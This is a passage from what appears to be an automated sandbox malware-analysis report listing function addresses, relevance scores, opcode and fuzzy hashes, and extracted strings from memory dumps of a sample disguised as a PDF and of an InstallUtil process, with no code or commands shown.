                                                                                      • Source File: 00000000.00000002.2222189418.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6750000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77c0c4c115fef5c35750985078fb2f1419b4a22232c0dde3c68d2c64edf41155
                                                                                      • Instruction ID: bfd3cb875857a2fd55700954b5f5c5f6d4b2215a2d62733e91f9a9748161bce6
                                                                                      • Opcode Fuzzy Hash: 77c0c4c115fef5c35750985078fb2f1419b4a22232c0dde3c68d2c64edf41155
                                                                                      • Instruction Fuzzy Hash: 9121FCB0D056188BEB19CFABD94479EFBF7BFC8300F14C1A9D808A6254EB7509458F40
                                                                                      Function 0649E038 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13ec5b9504f42cbf100f063bbccf2606127b6b6bb8e365738bcc335b5ba9448b
                                                                                      • Instruction ID: 76503fcf186497ec28f19bbb910c0e50d1d9d7047bdde965943e18a79fa26bca
                                                                                      • Opcode Fuzzy Hash: 13ec5b9504f42cbf100f063bbccf2606127b6b6bb8e365738bcc335b5ba9448b
                                                                                      • Instruction Fuzzy Hash: 5521DE71D456288BEB58CF5BC9406D9FBF7AFC9300F04C1BAD508AA254DB304A858F54
                                                                                      Function 06761310 Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq$4'sq$4'sq$4'sq$4'sq$pwq
                                                                                      • API String ID: 0-1920987972
                                                                                      • Opcode ID: 58cf9b8ae11d0612fe815f6321ee82947f31520400ba0c8d0414fcc72114f7c4
                                                                                      • Instruction ID: 808b005ab1ca11da1ac9c2f81eaded216bb8fc6929877e5f99e1d0be6facc2a6
                                                                                      • Opcode Fuzzy Hash: 58cf9b8ae11d0612fe815f6321ee82947f31520400ba0c8d0414fcc72114f7c4
                                                                                      • Instruction Fuzzy Hash: 9E51B370A042049FCB49EBB988917AEBAE7BFC8300F148828D54997285DF719D4687A1
                                                                                      Function 065C42C9 Relevance: 6.4, Strings: 5, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$;$=$@$xJ
                                                                                      • API String ID: 0-3446569977
                                                                                      • Opcode ID: 6c897e8ef88de26bd34ee1ab3166f6b3a6926cf61fad95ce998da035f2b2433b
                                                                                      • Instruction ID: 9c52f39aff805f18e0a5365a3ec2ca8a0ba9fd090f3c48fc02a57e19e49f486d
                                                                                      • Opcode Fuzzy Hash: 6c897e8ef88de26bd34ee1ab3166f6b3a6926cf61fad95ce998da035f2b2433b
                                                                                      • Instruction Fuzzy Hash: 664140B4A01218CFDB90CF99C484BDDBBF2BB89320F2094A9D809EB344D7749985CF54
                                                                                      Function 067645C0 Relevance: 5.5, Strings: 4, Instructions: 494COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $(wq$U$XRxq
                                                                                      • API String ID: 0-3916700077
                                                                                      • Opcode ID: 9b550ba5d3a81cd3d5d4659cdc0ecedb6de5a52082fc879853d8004edaf7c7a4
                                                                                      • Instruction ID: 4eca7550fc3552c1bbf5bd8eafb607992ddf8f3381084127318a54a0a3010486
                                                                                      • Opcode Fuzzy Hash: 9b550ba5d3a81cd3d5d4659cdc0ecedb6de5a52082fc879853d8004edaf7c7a4
                                                                                      • Instruction Fuzzy Hash: 4A025875B101148FCB98DF29C498A2977F2EF89715B2580A9E906CF3B9DB31DC41CB91
                                                                                      Function 067607A0 Relevance: 5.4, Strings: 4, Instructions: 406COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq$(wq$Hwq$Hwq
                                                                                      • API String ID: 0-1295389596
                                                                                      • Opcode ID: d7630a3b8f00d3a598fca1ad2283deb7af6c999cf22b2f87544fb1dd80d4231b
                                                                                      • Instruction ID: c5c729f52b1935886ba893a89f433800a6cca3b98f1037903ebd13c5bd1f8ef3
                                                                                      • Opcode Fuzzy Hash: d7630a3b8f00d3a598fca1ad2283deb7af6c999cf22b2f87544fb1dd80d4231b
                                                                                      • Instruction Fuzzy Hash: 6BE1CF30700215DFCB85DF29C580AAEBBA2FF88314F158569E8069B391DB34ED42CBE1
                                                                                      Function 069A0ACD Relevance: 5.2, Strings: 4, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8$=$xJ$}
                                                                                      • API String ID: 0-2446445526
                                                                                      • Opcode ID: 9233cb9fb77c6c5cf220addab502e2adc156da7c693ebec0a1baa5ea9aedd273
                                                                                      • Instruction ID: 3b4a5308c725880296ae137a9b6fecb3a8e523630cb24ab6813a4687c7ea88d9
                                                                                      • Opcode Fuzzy Hash: 9233cb9fb77c6c5cf220addab502e2adc156da7c693ebec0a1baa5ea9aedd273
                                                                                      • Instruction Fuzzy Hash: 2481F274A042298FDB64DF28D954BDABBB1FB49304F1081E9D959A7744DB309EC0CF90
                                                                                      Function 06502F61 Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: a$j$xJ$~
                                                                                      • API String ID: 0-488134002
                                                                                      • Opcode ID: 6ca67900dd8d7dbca406876514237062db4a57b03d3e06e7be21036f4749d3ff
                                                                                      • Instruction ID: b4d60d231b3118a91f45bc0fbbd9f83f4024b9b347da7b83b42a1ed013d35a0d
                                                                                      • Opcode Fuzzy Hash: 6ca67900dd8d7dbca406876514237062db4a57b03d3e06e7be21036f4749d3ff
                                                                                      • Instruction Fuzzy Hash: 4431E6B0D51228CFEBA0DFA4E898BDDBBB1BB09300F1055AAE519B7280D7744AC4CF55
                                                                                      Function 069A379B Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$?$C$xJ
                                                                                      • API String ID: 0-1181872310
                                                                                      • Opcode ID: 3ccd3cdc8c3377f493ff026cd4e993a43872f115bde9aebaa74d39d410e9eed1
                                                                                      • Instruction ID: 5c6a5cfdd471facbe010309a34b8a7af0d5e907128383098bbce6d2c53ae294a
                                                                                      • Opcode Fuzzy Hash: 3ccd3cdc8c3377f493ff026cd4e993a43872f115bde9aebaa74d39d410e9eed1
                                                                                      • Instruction Fuzzy Hash: 6421EFB4D0922ACFDB64DF24D9587EABAB5AB08308F1041EAD819A7B40E7704E80DF51

                                                                                      Executed Functions

                                                                                      Function 00B86748 Relevance: 6.7, Strings: 5, Instructions: 464COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (osq$(osq$(osq$,wq$,wq
                                                                                      • API String ID: 0-1903262254
                                                                                      • Opcode ID: e4fde9488a5db07a868e4487a052f9694e6dc443ba30e1a97a3ccdfe1d14765e
                                                                                      • Instruction ID: 57920428c1a4010bb4f61fbcd7ac081d5dd6a70874c7bc72566892d757670983
                                                                                      • Opcode Fuzzy Hash: e4fde9488a5db07a868e4487a052f9694e6dc443ba30e1a97a3ccdfe1d14765e
                                                                                      • Instruction Fuzzy Hash: 4B121B71A00109DFCB14DFA9D985AAEBBF2FF89304F1581A9E455AB2B1DB30ED41CB50
                                                                                      Function 00B8B338 Relevance: 6.6, Strings: 5, Instructions: 356COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                                                      • API String ID: 0-1434930255
                                                                                      • Opcode ID: b56cc6669ea80f5cbd26055a6d0faffd23cb0a3ea6ceb6e2b1cf6f2753507d94
                                                                                      • Instruction ID: 5cf252684b476af148d90e9acef12b17c066e9feeb5da260bf29ea9e91dfe5b7
                                                                                      • Opcode Fuzzy Hash: b56cc6669ea80f5cbd26055a6d0faffd23cb0a3ea6ceb6e2b1cf6f2753507d94
                                                                                      • Instruction Fuzzy Hash: 37E1D575A00218CFDB14DFA9D995A9DBBF1FF89310F1581A9E819AB362DB30AC41CF50
                                                                                      Function 00B8B7E2 Relevance: 6.4, Strings: 5, Instructions: 196COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                                                      • API String ID: 0-1434930255
                                                                                      • Opcode ID: e2d9d7033b047fb8e0383cd24c61286f81aa43b8272c36c3cb0c7952e6a4beb8
                                                                                      • Instruction ID: 8a4d5eb9e9b0d785bf747214ec29dcbdf7e8411aad1e452b3c0930f4ce368224
                                                                                      • Opcode Fuzzy Hash: e2d9d7033b047fb8e0383cd24c61286f81aa43b8272c36c3cb0c7952e6a4beb8
                                                                                      • Instruction Fuzzy Hash: BE91D575E04258CFDB14DFA9D984A9DBBF2BF89300F14D0A9E849AB365DB709941CF10
                                                                                      Function 00B8C1A0 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                                                      • API String ID: 0-1434930255
                                                                                      • Opcode ID: 9741441ef0ee2cc71d0db4957ab81d7969e12926672aca18879f46d1cb5434fd
                                                                                      • Instruction ID: f41a389b1cfa4327b3bbd41f2b18dbf9fe2012b2f1d6a510364b89a7b06d996b
                                                                                      • Opcode Fuzzy Hash: 9741441ef0ee2cc71d0db4957ab81d7969e12926672aca18879f46d1cb5434fd
                                                                                      • Instruction Fuzzy Hash: AC91B4B4E04258CFDB14DFA9D984A9DBBF2BF89300F14D0A9E809AB365DB309945CF10
                                                                                      Function 00B846D9 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                                                      • API String ID: 0-1434930255
                                                                                      • Opcode ID: d6f004c8bc559dfa4c1666f615e20bc0558d7469b3d9b817b4ca645be85bf460
                                                                                      • Instruction ID: ee39d6b50175ee90373973d7f5db200371bcf50438eaedeec26be3e6d2f488a2
                                                                                      • Opcode Fuzzy Hash: d6f004c8bc559dfa4c1666f615e20bc0558d7469b3d9b817b4ca645be85bf460
                                                                                      • Instruction Fuzzy Hash: 7781B274E00258DFDB14DFA9D984A9DBBF2BF88300F14C1A9E819AB265DB309941CF50
                                                                                      Function 00B8C480 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                                                      • API String ID: 0-1434930255
                                                                                      • Opcode ID: 963f8c26ff901b93293129a9c0ae4b90f70169d2e866627eb6c1d2f604777a43
                                                                                      • Instruction ID: 7f250d13c5d22d4779cd1d7273d35c763487a201d6a9c7498c6006fc46312bcc
                                                                                      • Opcode Fuzzy Hash: 963f8c26ff901b93293129a9c0ae4b90f70169d2e866627eb6c1d2f604777a43
                                                                                      • Instruction Fuzzy Hash: 288193B4E00218DFDB14DFA9D994A9DBBF2BF88300F14D1A9E809AB365DB349945CF50
                                                                                      Function 00B8C762 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                                                      • API String ID: 0-1434930255
                                                                                      • Opcode ID: fd43ec0b39bdcf4ae5aaacf055afb241d8a2f8d19d2efb9d3a2ae197cd840b42
                                                                                      • Instruction ID: 64e45bacfd6433acd2bf43f41dcdd361256e1df6d7f9e4a51d46d3348f83d1e7
                                                                                      • Opcode Fuzzy Hash: fd43ec0b39bdcf4ae5aaacf055afb241d8a2f8d19d2efb9d3a2ae197cd840b42
                                                                                      • Instruction Fuzzy Hash: 2D81C3B4E00218CFDB14DFA9D994A9DBBF2BF89300F14C1A9E849AB365DB309945CF50
                                                                                      Function 0614D5BE Relevance: 3.4, Strings: 2, Instructions: 850COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$Tesq
                                                                                      • API String ID: 0-1365298620
                                                                                      • Opcode ID: af59fba182e90b4c065b6cdb410dc89c781fd39131adfc55708c8f0c1ac29ecf
                                                                                      • Instruction ID: 7d2b79898d322860c0d9692c64d1a8256f8303e327199146884d0aeb78c71473
                                                                                      • Opcode Fuzzy Hash: af59fba182e90b4c065b6cdb410dc89c781fd39131adfc55708c8f0c1ac29ecf
                                                                                      • Instruction Fuzzy Hash: 1292D274A01228CFDB65EF64C994BADBBB2FB89304F1081E9D949A7364CB355E81CF50
                                                                                      Function 00B86120 Relevance: 3.0, Strings: 2, Instructions: 513COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (osq$Hwq
                                                                                      • API String ID: 0-1668724233
                                                                                      • Opcode ID: a58e34bf2c0b5df0fd9e154eb7c637d4bdb28b4916928658b4a9804e4acb06f2
                                                                                      • Instruction ID: cf544aa884cb5d00207f273b96f71c143d32fddbac6da6463bfcf31eee8ab4a2
                                                                                      • Opcode Fuzzy Hash: a58e34bf2c0b5df0fd9e154eb7c637d4bdb28b4916928658b4a9804e4acb06f2
                                                                                      • Instruction Fuzzy Hash: 04124D71A002199FDB18DF69C994AAEBBF6FF88300F248569E505DB361DF349D41CB90
                                                                                      Function 00B83572 Relevance: 2.9, Strings: 2, Instructions: 420COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xwq$$sq
                                                                                      • API String ID: 0-2558833440
                                                                                      • Opcode ID: 8326657be954b741f3f2ceabd079741bd5e954276682e79b8d8f51c59ac66813
                                                                                      • Instruction ID: 02cb0b7c00d6915c1f5bc94f2ed6a60702063b37b9c0daf6684900a887d86832
                                                                                      • Opcode Fuzzy Hash: 8326657be954b741f3f2ceabd079741bd5e954276682e79b8d8f51c59ac66813
                                                                                      • Instruction Fuzzy Hash: 82F16F75E052489FCB08EFB9D8949AEBBF2BF88700B14856DE406E7365DE349D02CB51
                                                                                      Function 06147A1E Relevance: 2.7, Strings: 2, Instructions: 248COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHsq$PHsq
                                                                                      • API String ID: 0-3507005907
                                                                                      • Opcode ID: 24e02b57fa0724f34a9aad3452e377a98914d2de8e6b1bbdf8bf8798bbcd57c5
                                                                                      • Instruction ID: a5cd620199c088752322b6bc9eaa6d85686867a89b733a91877fcf89546b1f02
                                                                                      • Opcode Fuzzy Hash: 24e02b57fa0724f34a9aad3452e377a98914d2de8e6b1bbdf8bf8798bbcd57c5
                                                                                      • Instruction Fuzzy Hash: D4A12970E01218DFDB58DFA5D854AEEBBB2BF89300F248569D409BB294DB309946CF90
                                                                                      Function 06140D48 Relevance: .7, Instructions: 745COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c299fce985738cd9c756d14c30e62c91ca1f411bdfa4aaf054505dd671154760
                                                                                      • Instruction ID: cff9062f48b628050aff71d16047f6021f5c4dade8b6615ebbe354539b75fa06
                                                                                      • Opcode Fuzzy Hash: c299fce985738cd9c756d14c30e62c91ca1f411bdfa4aaf054505dd671154760
                                                                                      • Instruction Fuzzy Hash: E5825D74E012289FDB64DF69CD99BDDBBB2AB89300F1081E9A50DA7265DB315EC1CF40
                                                                                      Function 00B8E441 Relevance: .7, Instructions: 713COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ee541037fece8e47d729ec9bcb2aa4397d608e8b230f4160416b5e88881822cd
                                                                                      • Instruction ID: c766d7faa43fd0e680c854835ff76fc54e27b94cf907d9faec0de4179917bc39
                                                                                      • Opcode Fuzzy Hash: ee541037fece8e47d729ec9bcb2aa4397d608e8b230f4160416b5e88881822cd
                                                                                      • Instruction Fuzzy Hash: 3972BF74E01228CFDB64EF69C994BDDBBB2BB49300F1491E9D419A7265DB34AE81CF40
                                                                                      Function 061474B0 Relevance: .3, Instructions: 296COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33f9942616b102b283912eaf89e760e34ceff41b1740ff1b4daee47b52453d0a
                                                                                      • Instruction ID: 843b412827dd971f3789b209d5b8939ecb60099cb78491f39ffd71f96689515e
                                                                                      • Opcode Fuzzy Hash: 33f9942616b102b283912eaf89e760e34ceff41b1740ff1b4daee47b52453d0a
                                                                                      • Instruction Fuzzy Hash: B9E1E274E00218CFEB64DFA5C984B9DBBB2BF88304F2081A9D409A7395DB355E85CF50
                                                                                      Function 00B8F788 Relevance: .3, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aa97eb9105f8c3e454146938d1d16513709cb7a1889d669b66ecabfe1912c4e6
                                                                                      • Instruction ID: f3572fd05f5d42d1ee96f06cd4d8b6b1ae75382e8adc1ace055f2123716e5772
                                                                                      • Opcode Fuzzy Hash: aa97eb9105f8c3e454146938d1d16513709cb7a1889d669b66ecabfe1912c4e6
                                                                                      • Instruction Fuzzy Hash: 31D19074E00218CFDB14DFA5D994BADBBB2BF89304F2081A9D809A7365DB359E85CF50
                                                                                      Function 0614A6B0 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b2b3fb6f16e8f3801850027c4084ec62b8cd9ab864329fe5614b8a4127da756
                                                                                      • Instruction ID: f834605efb3f782566324a7aabec40a2382c63eecaa7c51e412c6a8b712262f7
                                                                                      • Opcode Fuzzy Hash: 0b2b3fb6f16e8f3801850027c4084ec62b8cd9ab864329fe5614b8a4127da756
                                                                                      • Instruction Fuzzy Hash: F6A1A170E012288FEB68DF6AD944B9DBBF2AF89300F15C1AAD40DB7255DB345A85CF50
                                                                                      Function 0614AD00 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df364fdd261878e7cb2fc6cb54bba99379b85bb53faac3eadf937f05611f3c7d
                                                                                      • Instruction ID: b582ebc6cfe6036808a1f0bf48a71c642e800b8a819c2300a0815816068ffdc2
                                                                                      • Opcode Fuzzy Hash: df364fdd261878e7cb2fc6cb54bba99379b85bb53faac3eadf937f05611f3c7d
                                                                                      • Instruction Fuzzy Hash: 7EA1A2B5E012188FEB68DF6AD944B9DBAF2AF89300F14C0AAD408A7255DB345A85CF50
                                                                                      Function 06148D80 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 623be77095fb983d334dbceba7512326106ec1dcdc3b6e6b72f55a57926488cd
                                                                                      • Instruction ID: ea4616d082cac522c165f88ddd2babe9aeacdefc562e6a7330ec3cc7890ade94
                                                                                      • Opcode Fuzzy Hash: 623be77095fb983d334dbceba7512326106ec1dcdc3b6e6b72f55a57926488cd
                                                                                      • Instruction Fuzzy Hash: 75A1A275E012188FEB68DF6AD944B9EBBF2AF89300F14C0AAD40DA7255DB345A85CF50
                                                                                      Function 0614B350 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 738dfb49efb3ad3bc54a2d00939e13eef722dd56a919a2a268c4e7f7ddfbca07
                                                                                      • Instruction ID: ce9f9181856888f51ed3667816bd3a0cd40d0b066b00fa3f5b72435102c0ddfe
                                                                                      • Opcode Fuzzy Hash: 738dfb49efb3ad3bc54a2d00939e13eef722dd56a919a2a268c4e7f7ddfbca07
                                                                                      • Instruction Fuzzy Hash: 74A1A5B0E05218CFEB58DF6AD944B9DFBF2AF89300F14C0AAD409A7251D7349A85CF50
                                                                                      Function 0614A060 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
